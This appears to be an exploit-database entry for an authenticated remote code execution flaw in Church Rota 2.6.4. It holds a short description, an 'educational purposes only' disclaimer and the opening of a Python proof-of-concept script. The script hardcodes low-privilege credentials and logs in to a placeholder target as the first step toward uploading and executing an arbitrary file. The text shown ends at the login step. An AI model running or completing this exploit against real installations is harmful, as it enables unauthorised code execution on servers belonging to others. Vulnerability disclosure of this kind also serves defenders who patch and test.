Exploits / Vulnerability Discovered : 2021-01-20 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Churchrota 2.6.4 rce (authenticated) is for educational purposes only and if it is used you will do on your own risk!
############################################################################################################
# Description #
# Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. #
# The user does not need to have file upload permission in order to upload and execute an arbitrary file. #
# The application is written primarily with PHP so we use PHP in our PoC #
############################################################################################################
# credentials of the low privilege user
USERNAME='slixperi'
PASSWORD='slixperi'
# set the credentials for login POST
credentials = {"username":USERNAME,"password":PASSWORD}
# create a session to preserve session state
sesh = requests.session()
# login as our low-privilege user (normally only admins can upload files)
sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)